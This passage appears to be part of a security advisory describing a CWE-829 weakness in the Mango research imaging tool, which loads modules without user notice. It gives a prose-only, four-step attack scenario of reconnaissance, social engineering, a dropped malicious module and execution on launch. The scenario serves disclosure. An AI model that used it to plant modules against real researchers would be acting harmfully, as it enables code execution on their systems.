CWE-829 Inclusion of Functionality from Untrusted Control Sphere An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere. The software imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.

Implications & Threat

According to Google Scholar, Multi-image Analysis GUI (Mango) returns 298 results, spanning a time range from 2018 - 2022 (Accessed: 2022-06-22). There are many potential attack scenarios where having the ability to quietly insert a plugin into a research tool could be leveraged to further a threat actor’s aims.

One example to highlight the above point would be:

  1. A threat actor targeting researchers (or organizations) conducts open source intelligence reconnaissance and compiles a list of cited software used by key targets.
  2. The threat actor discovers Multi-image Analysis GUI (Mango) permits the loading of modules without user interaction or notice and further custom modules could be crafted to achieve code execution.
  3. The threat actor crafts a social engineering campaign which induces the target to: open a malicious document, file, or otherwise unknowingly start a process which drops a malicious modules
  4. The target, perhaps as part of the social engineering campaign, or otherwise, runs Mango. At this point the malicious payload could be unknowingly executed moving the threat actor closer to achieving their goal.